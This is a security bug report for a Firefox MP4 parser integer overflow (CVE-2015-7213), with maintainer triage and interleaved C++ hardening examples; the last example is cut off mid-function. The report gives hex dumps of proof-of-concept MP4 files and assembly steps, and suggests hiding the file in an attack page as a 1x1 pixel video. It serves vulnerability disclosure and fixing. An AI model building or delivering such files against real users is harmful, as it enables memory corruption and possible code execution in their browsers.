Closed Bug 1206211 (CVE-2015-7213) Opened 9 years ago Closed 9 years ago

Overflow in MPEG4Extractor::readMetaData causes memory-safety bug

Categories

(Core :: Audio/Video: Playback, defect)

40 Branch
defect
Not set
normal

Tracking


VERIFIED FIXED
mozilla44
Tracking Status
firefox43 + verified
firefox44 + verified
firefox-esr38 43+ verified

People

(Reporter: q1, Assigned: jya)

References

Details

(Keywords: csectype-intoverflow, reporter-external, sec-high, Whiteboard: [adv-main43+][adv-esr38.5+])

Attachments

(8 files)

MPEG4Extractor::readMetaData (media\libstagefright\frameworks\av\media\libstagefright\MPEG4Extractor.cpp) will experience an integer overflow with certain MP4 files. This causes the function to allocate an erroneously-small buffer, which it then overruns. The data causing the overrun comes directly from the MP4 file and is, thus, under an attacker's control. This bug currently is exploitable only on x64 versions of FF, but it might be possible to exploit it on x86 versions as well.

Details
-------

The bug is in lines 511-514:

511: int psshsize = 0;
512: for (size_t i = 0; i < mPssh.size(); i++) {
513:     psshsize += 20 + mPssh[i].datalen;
514: }
515: if (psshsize) {
516:     char *buf = (char*)malloc(psshsize);
517:     char *ptr = buf;
518:     for (size_t i = 0; i < mPssh.size(); i++) {
519:         memcpy(ptr, mPssh[i].uuid, 20); // uuid + length
520:         memcpy(ptr + 20, mPssh[i].data, mPssh[i].datalen);
521:         ptr += (20 + mPssh[i].datalen);
522:     }
523:     mFileMetaData->setData(kKeyPssh, 'pssh', buf, psshsize);
524:     free(buf);
525: }

which don't check for overflow of |psshsize|. Thus, a file containing pssh boxes totalling > 4GB causes line 513 to overflow. Line 516 then allocates an erroneously-small buffer, which lines 518-522 then overrun with data extracted directly from the MP4 file.

This bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/37c7812ce0e6/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp

The bug is easy to invoke.
Using a binary editor, create poc_header.bin with the following data: 000: 00 00 00 1c 66 74 79 70 6d 70 34 32 00 00 00 00 010: 6d 70 34 32 69 73 6f 6d 61 76 63 31 00 00 00 84 020: 66 72 65 65 00 00 00 00 00 00 00 00 00 00 00 00 030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Then create poc_trailer.bin with this data: 000: 00 00 0d 83 6d 6f 6f 76 00 00 00 6c 6d 76 68 64 moov lmvhd 010: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90 _ 020: 00 07 a5 80 00 01 00 00 01 00 00 00 00 00 00 00 030: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 040: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 050: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 @ 060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 070: 00 00 00 03 00 00 00 18 69 6f 64 73 00 00 00 00 iods 080: 10 80 80 80 07 00 4f ff ff 0f 7f ff 00 00 06 0a O 090: 74 72 61 6b 00 00 00 5c 74 6b 68 64 00 00 00 01 trak \tkhd 0a0: c7 ca ee a7 c7 ca ee a8 00 00 00 01 00 00 00 00 0b0: 00 07 99 50 00 00 00 00 00 00 00 00 00 00 00 00 P 0c0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0d0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0e0: 00 00 00 00 40 00 00 00 02 30 00 00 01 40 00 00 @ 0 @ 0f0: 00 00 05 a6 6d 64 69 61 00 00 00 20 6d 64 68 64 mdia mdhd 100: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90 _ 110: 00 07 99 50 55 c4 00 00 00 00 00 21 68 64 6c 72 PU !hdlr 120: 00 00 00 00 00 00 00 00 76 69 64 65 00 00 00 00 vide 130: 00 00 00 00 00 00 00 00 00 00 00 05 5d 6d 69 6e ]min 140: 66 00 00 00 14 76 6d 68 64 00 00 00 01 00 00 00 f vmhd 150: 00 00 00 00 00 00 00 00 24 64 69 6e 66 00 00 00 $dinf 160: 1c 64 72 65 66 00 00 00 00 00 00 00 01 00 00 00 dref 170: 0c 75 72 6c 20 00 00 00 01 00 00 05 1d 73 
74 62 url stb 180: 6c 00 00 00 ab 73 74 73 64 00 00 00 00 00 00 00 l stsd 190: 01 00 00 00 9b 61 76 63 31 00 00 00 00 00 00 00 avc1 1a0: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b0: 00 02 30 01 40 00 48 00 00 00 48 00 00 00 00 00 0 @ H H 1c0: 00 00 01 0e 4a 56 54 2f 41 56 43 20 43 6f 64 69 JVT/AVC Codi 1d0: 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ng 1e0: 00 00 00 00 18 ff ff 00 00 00 33 61 76 63 43 01 3avcC 1f0: 42 c0 1e ff e1 00 1b 67 42 c0 1e 9e 21 81 18 53 B gB ! S 200: 4d 40 40 40 50 00 00 03 00 10 00 00 03 03 c8 f1 M@@@P 210: 62 ee 01 00 05 68 ce 06 cb 20 00 00 00 12 63 6f b h co 220: 6c 72 6e 63 6c 63 00 01 00 01 00 01 00 00 00 18 lrnclc 230: 73 74 74 73 00 00 00 00 00 00 00 01 00 00 00 a6 stts 240: 00 00 0b b8 00 00 02 ac 73 74 73 7a 00 00 00 00 stsz 250: 00 00 00 00 00 00 00 a6 00 00 56 27 00 00 0b 20 V' 260: 00 00 05 bc 00 00 05 e2 00 00 05 c1 00 00 04 37 7 270: 00 00 04 07 00 00 03 b6 00 00 06 45 00 00 03 73 E s 280: 00 00 05 12 00 00 03 26 00 00 02 e9 00 00 03 7b & { 290: 00 00 03 4a 00 00 03 6b 00 00 02 b6 00 00 03 4c J k L 2a0: 00 00 02 7a 00 00 02 c7 00 00 02 2e 00 00 03 16 z . 
2b0: 00 00 02 26 00 00 02 7f 00 00 01 ec 00 00 01 ea & 2c0: 00 00 01 f5 00 00 01 eb 00 00 01 fa 00 00 01 e7 2d0: 00 00 01 fc 00 00 01 dd 00 00 01 c6 00 00 01 ae 2e0: 00 00 01 c8 00 00 01 b9 00 00 01 90 00 00 01 93 2f0: 00 00 01 8c 00 00 01 da 00 00 01 c2 00 00 05 d0 300: 00 00 07 b8 00 00 06 7a 00 00 09 a9 00 00 0a 2c z , 310: 00 00 0a 7c 00 00 0c b3 00 00 09 8c 00 00 09 52 | R 320: 00 00 0c 04 00 00 0d c1 00 00 0f 74 00 00 10 48 t H 330: 00 00 11 06 00 00 10 61 00 00 0c 63 00 00 0c 31 a c 1 340: 00 00 0b 42 00 00 0c 0d 00 00 0f 32 00 00 0a 7b B 2 { 350: 00 00 0d 0f 00 00 0a e0 00 00 0a 0e 00 00 0b 6b k 360: 00 00 08 74 00 00 0c 36 00 00 09 e6 00 00 06 8d t 6 370: 00 00 04 f8 00 00 07 8a 00 00 07 c1 00 00 09 f3 380: 00 00 07 c7 00 00 0a cb 00 00 0a d2 00 00 0b 74 t 390: 00 00 0c 28 00 00 0a 9a 00 00 0c 60 00 00 0d 6d ( ` m 3a0: 00 00 0c 3e 00 00 0f fc 00 00 0e 82 00 00 0b 79 > y 3b0: 00 00 0d e4 00 00 0d 24 00 00 0a 17 00 00 11 aa $ 3c0: 00 00 12 65 00 00 0d 7b 00 00 12 a0 00 00 13 d8 e { 3d0: 00 00 11 49 00 00 0e 59 00 00 10 15 00 00 16 81 I Y 3e0: 00 00 09 b4 00 00 06 eb 00 00 05 ef 00 00 05 8a 3f0: 00 00 03 d7 00 00 04 0d 00 00 03 bb 00 00 04 6b k 400: 00 00 03 40 00 00 03 30 00 00 02 de 00 00 03 ae @ 0 410: 00 00 05 cf 00 00 04 6c 00 00 05 69 00 00 05 00 l i 420: 00 00 06 a1 00 00 03 35 00 00 04 1a 00 00 03 fa 5 430: 00 00 06 3d 00 00 05 d6 00 00 04 68 00 00 02 d6 = h 440: 00 00 04 b5 00 00 02 d9 00 00 02 7f 00 00 02 4d M 450: 00 00 02 7d 00 00 03 8c 00 00 02 06 00 00 02 01 } 460: 00 00 07 7f 00 00 05 ef 00 00 05 b8 00 00 04 0a 470: 00 00 02 99 00 00 03 1d 00 00 07 c5 00 00 05 ac 480: 00 00 04 78 00 00 08 71 00 00 08 99 00 00 08 e9 x q 490: 00 00 08 99 00 00 05 73 00 00 07 c7 00 00 08 3d s = 4a0: 00 00 0b 59 00 00 0a 36 00 00 06 ba 00 00 05 f9 Y 6 4b0: 00 00 07 2e 00 00 06 eb 00 00 04 c6 00 00 04 ba . 
4c0: 00 00 05 66 00 00 04 31 00 00 06 8a 00 00 06 cf f 1 4d0: 00 00 06 fe 00 00 04 97 00 00 02 43 00 00 03 e2 C 4e0: 00 00 04 06 00 00 02 e6 00 00 02 6b 00 00 02 75 k u 4f0: 00 00 00 28 73 74 73 63 00 00 00 00 00 00 00 02 (stsc 500: 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 2a * 510: 00 00 00 02 00 00 00 01 00 00 00 b8 73 74 63 6f stco 520: 00 00 00 00 00 00 00 2a 00 00 00 a8 00 00 73 e6 * s 530: 00 00 8b f4 00 00 a4 08 00 00 b7 64 00 00 c8 a5 d 540: 00 00 d7 d8 00 00 e4 a5 00 00 ec 5f 00 00 f8 5f _ _ 550: 00 01 04 41 00 01 1f c3 00 01 51 85 00 01 84 7e A Q ~ 560: 00 01 cc a6 00 02 03 c0 00 02 3c 52 00 02 66 75 <R fu 570: 00 02 8a 1c 00 02 b4 a6 00 02 e7 66 00 03 23 01 f # 580: 00 03 5d ac 00 03 9e 97 00 03 ea 64 00 04 26 0a ] d & 590: 00 04 3e 69 00 04 4c ff 00 04 63 d9 00 04 7e 43 >i L c ~C 5a0: 00 04 98 9b 00 04 ad a9 00 04 be f7 00 04 d7 94 5b0: 00 04 ed 6c 00 05 0e 3b 00 05 2d c9 00 05 59 f0 l ; - Y 5c0: 00 05 7b 82 00 05 95 2b 00 05 b3 da 00 05 c6 67 { + g 5d0: 00 00 00 14 73 74 73 73 00 00 00 00 00 00 00 01 stss 5e0: 00 00 00 01 00 00 00 b2 73 64 74 70 00 00 00 00 sdtp 5f0: 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDD 600: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 610: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 620: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 630: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 640: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 650: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 660: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 670: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 680: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 690: 44 44 44 44 44 44 00 00 06 7e 74 72 61 6b 00 00 DDDDDD ~trak 6a0: 00 5c 74 6b 68 64 00 00 00 03 c7 ca ee a7 c7 ca \tkhd 6b0: ee a8 00 00 00 02 00 00 00 00 00 07 a5 80 00 00 6c0: 00 00 00 00 00 00 00 
00 00 00 01 00 00 00 00 01 6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 @ 6f0: 00 00 00 00 00 00 00 00 00 00 00 00 06 04 6d 64 md 700: 69 61 00 00 00 20 6d 64 68 64 00 00 00 00 c7 ca ia mdhd 710: ee a7 c7 ca ee a8 00 00 bb 80 00 04 14 00 15 c7 720: 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00 !hdlr 730: 00 00 73 6f 75 6e 00 00 00 00 00 00 00 00 00 00 soun 740: 00 00 00 00 00 05 bb 6d 69 6e 66 00 00 00 10 73 minf s 750: 6d 68 64 00 00 00 00 00 00 00 00 00 00 00 24 64 mhd $d 760: 69 6e 66 00 00 00 1c 64 72 65 66 00 00 00 00 00 inf dref 770: 00 00 01 00 00 00 0c 75 72 6c 20 00 00 00 01 00 url 780: 00 05 7f 73 74 62 6c 00 00 00 67 73 74 73 64 00 stbl gstsd 790: 00 00 00 00 00 00 01 00 00 00 57 6d 70 34 61 00 Wmp4a 7a0: 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 7b0: 01 00 10 00 00 00 00 bb 80 00 00 00 00 00 33 65 3e 7c0: 73 64 73 00 00 00 00 03 80 80 80 22 00 00 00 04 sds " 7d0: 80 80 80 14 40 15 00 01 18 00 01 65 f0 00 01 44 @ e D 7e0: 6b 05 80 80 80 02 11 88 06 80 80 80 01 02 00 00 k 7f0: 00 18 73 74 74 73 00 00 00 00 00 00 00 01 00 00 stts 800: 01 05 00 00 04 00 00 00 04 28 73 74 73 7a 00 00 (stsz 810: 00 00 00 00 00 00 00 00 01 05 00 00 00 f7 00 00 820: 00 db 00 00 00 e1 00 00 00 e5 00 00 00 e9 00 00 830: 00 e8 00 00 00 f0 00 00 00 f1 00 00 00 ef 00 00 840: 00 d8 00 00 00 e6 00 00 00 e7 00 00 00 e9 00 00 850: 00 eb 00 00 00 ea 00 00 00 e8 00 00 00 e1 00 00 860: 00 e7 00 00 00 d7 00 00 00 da 00 00 00 d9 00 00 870: 00 db 00 00 00 e9 00 00 00 ee 00 00 00 e5 00 00 880: 00 e1 00 00 00 e6 00 00 00 e5 00 00 00 d8 00 00 890: 00 dd 00 00 00 dd 00 00 00 d5 00 00 00 ea 00 00 8a0: 00 dd 00 00 00 d0 00 00 00 d6 00 00 00 e9 00 00 8b0: 00 bc 00 00 00 ab 00 00 00 b3 00 00 00 b5 00 00 8c0: 00 bc 00 00 00 ce 00 00 00 b4 00 00 00 b6 00 00 8d0: 00 b3 00 00 00 b6 00 00 00 b7 00 00 00 bf 00 00 8e0: 00 b7 00 00 00 cd 00 00 00 c1 00 00 00 ba 00 00 8f0: 00 a7 00 00 00 b4 00 00 00 b1 00 00 00 be 00 00 900: 00 d0 00 00 00 
ba 00 00 00 bc 00 00 00 c4 00 00 910: 00 c6 00 00 00 cb 00 00 00 c4 00 00 00 c3 00 00 920: 00 c8 00 00 00 d2 00 00 00 d2 00 00 00 d6 00 00 930: 00 f5 00 00 00 fa 00 00 00 f6 00 00 01 02 00 00 940: 00 fc 00 00 00 fc 00 00 00 ee 00 00 00 e6 00 00 950: 00 ea 00 00 00 ea 00 00 00 e8 00 00 00 de 00 00 960: 00 df 00 00 00 e7 00 00 00 f6 00 00 00 ff 00 00 970: 01 03 00 00 00 f6 00 00 01 08 00 00 01 03 00 00 980: 00 fd 00 00 01 05 00 00 01 02 00 00 01 00 00 00 990: 01 14 00 00 01 18 00 00 00 fd 00 00 00 fb 00 00 9a0: 01 11 00 00 01 05 00 00 01 05 00 00 01 0a 00 00 9b0: 01 01 00 00 00 f3 00 00 00 f7 00 00 00 f7 00 00 9c0: 01 01 00 00 01 02 00 00 00 f8 00 00 00 f8 00 00 9d0: 00 ef 00 00 00 ed 00 00 00 e3 00 00 00 ec 00 00 9e0: 00 e2 00 00 00 e8 00 00 00 dc 00 00 00 e0 00 00 9f0: 00 f3 00 00 00 df 00 00 00 e1 00 00 00 cf 00 00 a00: 00 ce 00 00 00 d8 00 00 00 ce 00 00 00 c7 00 00 a10: 00 cd 00 00 00 b7 00 00 00 af 00 00 00 c8 00 00 a20: 00 d7 00 00 00 e5 00 00 00 e4 00 00 00 c6 00 00 a30: 00 d1 00 00 00 d5 00 00 00 e5 00 00 00 d8 00 00 a40: 00 c8 00 00 00 be 00 00 00 bf 00 00 00 cb 00 00 a50: 00 d2 00 00 00 c8 00 00 00 ca 00 00 00 b1 00 00 a60: 00 a3 00 00 00 c7 00 00 00 dc 00 00 00 d9 00 00 a70: 00 dd 00 00 00 d1 00 00 00 d2 00 00 00 c2 00 00 a80: 00 bc 00 00 00 b1 00 00 00 9b 00 00 00 89 00 00 a90: 00 a2 00 00 00 9f 00 00 00 b5 00 00 00 a6 00 00 aa0: 00 b2 00 00 00 b5 00 00 00 ae 00 00 00 b4 00 00 ab0: 00 b0 00 00 00 c6 00 00 00 c3 00 00 00 d5 00 00 ac0: 00 e4 00 00 00 f6 00 00 00 d6 00 00 00 db 00 00 ad0: 00 cc 00 00 00 e7 00 00 00 f9 00 00 00 cb 00 00 ae0: 00 d8 00 00 00 d6 00 00 00 e4 00 00 00 f1 00 00 af0: 00 e4 00 00 00 e6 00 00 00 df 00 00 00 ee 00 00 b00: 00 d7 00 00 00 c7 00 00 00 e7 00 00 00 f9 00 00 b10: 00 ed 00 00 00 cf 00 00 00 f1 00 00 00 e6 00 00 b20: 00 dc 00 00 00 e4 00 00 00 ef 00 00 00 e5 00 00 b30: 00 f1 00 00 00 e3 00 00 00 ec 00 00 00 ec 00 00 b40: 00 f3 00 00 00 f5 00 00 00 fd 00 00 01 0b 00 00 b50: 01 10 00 00 01 11 00 00 01 03 00 00 01 01 00 00 b60: 
00 fb 00 00 00 fa 00 00 00 e7 00 00 00 e5 00 00 b70: 00 f0 00 00 00 d2 00 00 00 e5 00 00 00 f3 00 00 b80: 00 f1 00 00 00 f2 00 00 00 ff 00 00 00 f7 00 00 b90: 00 ee 00 00 00 d5 00 00 00 d9 00 00 00 ea 00 00 ba0: 00 e3 00 00 00 df 00 00 00 f7 00 00 00 ff 00 00 bb0: 00 f8 00 00 00 fa 00 00 00 fd 00 00 00 f7 00 00 bc0: 00 f9 00 00 00 fb 00 00 00 f8 00 00 00 f6 00 00 bd0: 00 f0 00 00 00 fe 00 00 01 02 00 00 00 e9 00 00 be0: 00 ec 00 00 00 ec 00 00 00 e7 00 00 00 ea 00 00 bf0: 00 de 00 00 00 e2 00 00 00 c9 00 00 00 d4 00 00 c00: 00 d4 00 00 00 c7 00 00 00 c9 00 00 00 c8 00 00 c10: 00 c1 00 00 00 c0 00 00 00 bd 00 00 00 de 00 00 c20: 00 cb 00 00 00 cd 00 00 00 d4 00 00 00 6d 00 00 m c30: 00 28 73 74 73 63 00 00 00 00 00 00 00 02 00 00 (stsc c40: 00 01 00 00 00 07 00 00 00 01 00 00 00 26 00 00 & c50: 00 02 00 00 00 01 00 00 00 a8 73 74 63 6f 00 00 stco c60: 00 00 00 00 00 26 00 00 6d 8d 00 00 85 9b 00 00 & m c70: 9d e4 00 00 b1 21 00 00 c2 a7 00 00 d2 8e 00 00 ! c80: df 8e 00 00 f3 54 00 00 fe e8 00 01 1a 05 00 01 T c90: 4a c7 00 01 7e 28 00 01 c5 a1 00 01 fc 89 00 02 J ~( ca0: 35 5c 00 02 83 6a 00 02 ae 62 00 02 e1 ae 00 03 5\ j b cb0: 1d 6d 00 03 58 04 00 03 99 4d 00 03 e4 b1 00 04 m X M cc0: 21 99 00 04 39 67 00 04 5d c6 00 04 78 18 00 04 ! 
cd0: 92 6a 00 04 a7 67 00 04 b8 7e 00 04 d0 6c 00 04   j g ~ l
ce0: e7 0c 00 05 07 c6 00 05 53 5c 00 05 74 bc 00 05   S\ t
cf0: 8e 99 00 05 ae 19 00 05 c0 eb 00 05 cb 47 00 00   G
d00: 00 16 75 64 74 61 00 00 00 0e 6e 61 6d 65 53 74   udta nameSt
d10: 65 72 65 6f 00 00 00 6f 75 64 74 61 00 00 00 67   ereo oudta g
d20: 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72   meta !hdlr
d30: 00 00 00 00 00 00 00 00 6d 64 69 72 00 00 00 00   mdir
d40: 00 00 00 00 00 00 00 00 00 00 00 00 3a 69 6c 73   :ils
d50: 74 00 00 00 32 a9 74 6f 6f 00 00 00 2a 64 61 74   t 2 too *dat
d60: 61 00 00 00 01 00 00 00 00 62 6c 61 68 62 6c 61   a blahbla
d70: 68 62 20 30 2e 39 2e 34 20 32 32 32 32 31 31 32   hb 0.9.4 2222112
d80: 33 30 30 00 00 00 08 66 72 65 65

Then create poc_body.bin with these contents:

000: 01 00 00 00 70 73 73 68 00 00 00 04 ee ee ee ee   pssh
010: ee ee ee ee ee ee ee ee ee ee ee ee 00 00 00 00
020: 50 75 74 20 79 6f 75 72 20 61 74 74 61 63 6b 20   Put your attack
030: 63 6f 64 65 20 61 6e 64 20 64 61 74 61 20 68 65   code and data he
040: 72 65 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e   re..............
050: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------

Set the length of poc_body.bin to 0x01000000. It doesn't matter what bytes 0x20-0xffffff contain. Next, repeatedly double poc_body.bin until it's exactly 0x100000000 bytes long (4GB). Then copy poc_header.bin+poc_body.bin+poc_trailer.bin into poc_test.mp4. Start FF Win64 and attach a debugger, setting a BP on line 511. Load poc_test.mp4 and wait for the BP to fire, then step the code to see the overflow and subsequent overrun.
The file takes ~30 sec to load. It could be embedded into an attack page as a 1x1 pixel video so users wouldn't notice it loading.
Flags: needinfo?(jyavenard)
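The overflow described in comment 0, as an added example in C++ that is neither the original libstagefright code nor any of the patches attached to this bug: the unchecked accumulation from lines 511-514 next to a checked variant that sums in 64 bits and bails out once the total passes a cap. `PsshEntry`, `UncheckedPsshSize`, `CheckedPsshSize`, `kMaxPsshBytes` and the two sample inputs are this example's own constructions; the 2 GiB cap is taken from the "limiting size to 2GiB" remark in the approval request later in this bug, and the sample input only approximates the shape of the doubled poc_body.bin (the exact datalen the parser derives from it is not shown here).

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

// Constructed stand-in for the mPssh entries of MPEG4Extractor (hypothetical
// name; only the field the size computation reads is modelled).
struct PsshEntry {
    uint32_t datalen;  // payload length as read from the file
};

// Same accumulation as lines 511-514 of the report, written with uint32_t so
// the wrap-around is well defined here (the original uses a signed int, where
// overflow is undefined behaviour, but the effect on the sum is the same).
uint32_t UncheckedPsshSize(const std::vector<PsshEntry>& pssh) {
    uint32_t psshsize = 0;
    for (const PsshEntry& e : pssh) {
        psshsize += 20 + e.datalen;  // wraps silently once the total passes 4 GiB
    }
    return psshsize;
}

// Hardened variant: accumulate in 64 bits and stop as soon as the running
// total exceeds a fixed cap. The 2 GiB figure follows the "limiting size to
// 2GiB" remark in the approval request; cap and names are assumptions of this
// example, not the landed patch.
const uint64_t kMaxPsshBytes = 2ULL * 1024 * 1024 * 1024;

bool CheckedPsshSize(const std::vector<PsshEntry>& pssh, size_t* out) {
    uint64_t total = 0;
    for (const PsshEntry& e : pssh) {
        // Checking after every addition keeps `total` at most the cap plus one
        // 32-bit term, so the 64-bit sum itself can never wrap.
        total += 20ULL + e.datalen;
        if (total > kMaxPsshBytes) {
            return false;  // caller bails out of parsing; nothing is allocated
        }
    }
    *out = static_cast<size_t>(total);
    return true;
}

// Constructed input shaped like the PoC: 256 pssh boxes of 16 MiB each, with
// the last one 256 bytes longer so the 32-bit sum lands on a small positive
// value (2^32 + 256 wraps to 256) while the real payload is just over 4 GiB.
std::vector<PsshEntry> MakeOverflowingSample() {
    const uint32_t kBox = 16u * 1024 * 1024;  // 0x01000000 bytes per box
    std::vector<PsshEntry> v(256, PsshEntry{kBox - 20});
    v.back().datalen += 256;
    return v;
}

// Constructed benign input: two boxes of 100 payload bytes, 120 each with header.
std::vector<PsshEntry> MakeSmallSample() {
    return {PsshEntry{100}, PsshEntry{100}};
}

int main() {
    std::printf("unchecked: %u bytes\n",
                static_cast<unsigned>(UncheckedPsshSize(MakeOverflowingSample())));
    size_t n = 0;
    std::printf("checked: %s\n",
                CheckedPsshSize(MakeOverflowingSample(), &n) ? "accepted" : "rejected");
    return 0;
}
```

With the overflowing sample the unchecked sum reports 256 bytes for more than 4 GiB of payload, which is exactly the undersized malloc the report describes; the checked version refuses the input on the 129th box, before any allocation happens. Capping at a fixed limit rather than at SIZE_MAX also keeps the eventual allocation within what a media parser should ever hand to malloc.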
Could you please attach the test file to make it easier to confirm? Thanks.
Flags: needinfo?(q1)
(In reply to Andrew McCreight [:mccr8] from comment #2)
> Could you please attach the test file to make it easier to confirm? Thanks.

OK. You'll need to edit the poc_body.bin file, extend it, and so forth as described at the end of comment 0. Otherwise it'd be too large to upload. I'll upload the binary files momentarily.
Flags: needinfo?(q1)
Attached file poc_header.bin —
Attached file poc_trailer.bin —
Attached file poc_body.bin —
Attachment #8664340 - Attachment filename: poc_lsf_trailer_1.bin → poc_trailer.bin
Attachment #8664336 - Attachment filename: poc_lsf_hdr_1.bin → poc_header.bin
Attachment #8664342 - Attachment filename: poc_lsf_pssh_2.bin → poc_body.bin
OK. Enjoy!
(In reply to q1 from comment #3)
> (In reply to Andrew McCreight [:mccr8] from comment #2)
> > Could you please attach the test file to make it easier to confirm? Thanks.
>
> OK. You'll need to edit the poc_body.bin file, extend it, and so forth as
> described at the end of comment 0. Otherwise it'd be too large to upload.
> I'll upload the binary files momentarily.

The described test case should compress very well with, say, xz or lzma if that body is just the same repeated byte. Can you please attach a ready-to-run test that has been compressed? Thanks.
Depends on: 1207312
(In reply to q1 from comment #9)
> Created attachment 8664449 [details]
> poc.7z -- unzip with 7z into ready-to-use POC

Thanks! I tried to reproduce the issue but hit another I came across while fuzzing a couple weeks ago. I have logged the other issue. In the meantime any back traces or ASan logs that you managed to capture would also be nice to have.
(In reply to Tyson Smith [:tsmith] from comment #10)
> (In reply to q1 from comment #9)
> > Created attachment 8664449 [details]
> > poc.7z -- unzip with 7z into ready-to-use POC
>
> Thanks! I tried to reproduce the issue but hit another I came across while
> fuzzing a couple weeks ago. I have log the other issue. In the mean time any
> back traces or ASan logs that you managed to capture would also be nice to
> have.

I found this via code inspection, then formulated the POC. I have tested it under FF 40.0 debug Win64, which is my build with a few trivial unrelated mods. It also crashes 40.0b8 Win64 downloaded directly from ftp.mozilla.org, and if you examine it in the debugger, the crash was clearly caused by memory getting overwritten with the POC's test pattern.
Flags: sec-bounty?
Flags: needinfo?(jyavenard)
git bz lost my comment; will provide it again later.
Attachment #8665247 - Flags: review?(ajones)
Attached patch P2. Abort on OOM. — — Splinter Review
Attachment #8665248 - Flags: review?(ajones)
So what I was saying (though will do in a shorter version):

While I could see how we could think it would happen theoretically, it can no longer happen following bug 1196398 (which is in 41 onward). We only ever parse the ftyp and moov atoms; anything in between is ignored. And as such, with this POC.mp4 you'll find that mPssh is an empty array.

We no longer support encrypted MP4 outside fragmented mp4 and MSE; as such we don't attempt to parse pssh atoms; we use the MoofParser for this, which doesn't have this vulnerability.

Now you could attempt to craft an mp4 where those pssh would be within the moov atom; but for this to work, you would need the moov atom to have a size > 2GB, which isn't possible and would cause a decoding error. We could make the moov atom the last atom and give it a size of 0 (which normally means: read to the end). However, stagefright doesn't support those and will also return an error, as it errors if the atom size is below 8.

As such, this vulnerability doesn't apply in 41 and later.
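The top-level atom handling described in the comment above (consume only ftyp and moov, skip everything else by its declared size, and error on an atom whose size is below 8 or that cannot fit in the file), as an added C++ example that is not libstagefright's or Mozilla's code. `ReadBoxHeader`, `WalkTopLevel`, the 2 GiB `kMaxBoxSize` cap (taken from the "> 2GB" remark above) and the constructed sample files are assumptions of this example; the 64-bit largesize form (32-bit size field equal to 1) comes from the ISO BMFF format and is handled so that legitimately large files still walk, while a size of 0 is rejected the way the comment describes rather than treated as "to end of file".

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Constructed example: one box-header reader plus a walker over the top-level
// boxes of a file held in memory.
struct BoxHeader {
    std::string type;  // four-character code, e.g. "ftyp"
    uint64_t offset;   // start of the box within the file
    uint64_t size;     // total box size, header included
};

static uint32_t ReadBE32(const uint8_t* p) {
    return (uint32_t(p[0]) << 24) | (uint32_t(p[1]) << 16) |
           (uint32_t(p[2]) << 8) | uint32_t(p[3]);
}

// Assumed cap on a single box, mirroring the "> 2GB" limit in the comment.
const uint64_t kMaxBoxSize = 2ULL * 1024 * 1024 * 1024;

// Reads the box header at `offset`. Returns false for any size that cannot be
// honoured: below the header length (covers size 0 and 2..7), above the cap,
// or running past the end of the file.
bool ReadBoxHeader(const std::vector<uint8_t>& file, uint64_t offset, BoxHeader* out) {
    const uint64_t fileSize = file.size();
    if (offset > fileSize || fileSize - offset < 8) return false;
    uint64_t size = ReadBE32(&file[offset]);
    uint64_t headerLen = 8;
    if (size == 1) {  // 64-bit largesize follows the type field
        if (fileSize - offset < 16) return false;
        size = (uint64_t(ReadBE32(&file[offset + 8])) << 32) | ReadBE32(&file[offset + 12]);
        headerLen = 16;
    }
    if (size < headerLen) return false;          // smaller than its own header
    if (size > kMaxBoxSize) return false;        // assumed cap
    if (size > fileSize - offset) return false;  // box extends past end of file
    out->type.assign(reinterpret_cast<const char*>(&file[offset + 4]), 4);
    out->offset = offset;
    out->size = size;
    return true;
}

// Walks the top-level boxes. The types a parser would consume (ftyp, moov) are
// appended to `consumed`; everything else is skipped by its size. Returns
// false as soon as a header fails validation.
bool WalkTopLevel(const std::vector<uint8_t>& file, std::vector<std::string>* consumed) {
    uint64_t offset = 0;
    while (offset < file.size()) {
        BoxHeader h;
        if (!ReadBoxHeader(file, offset, &h)) return false;
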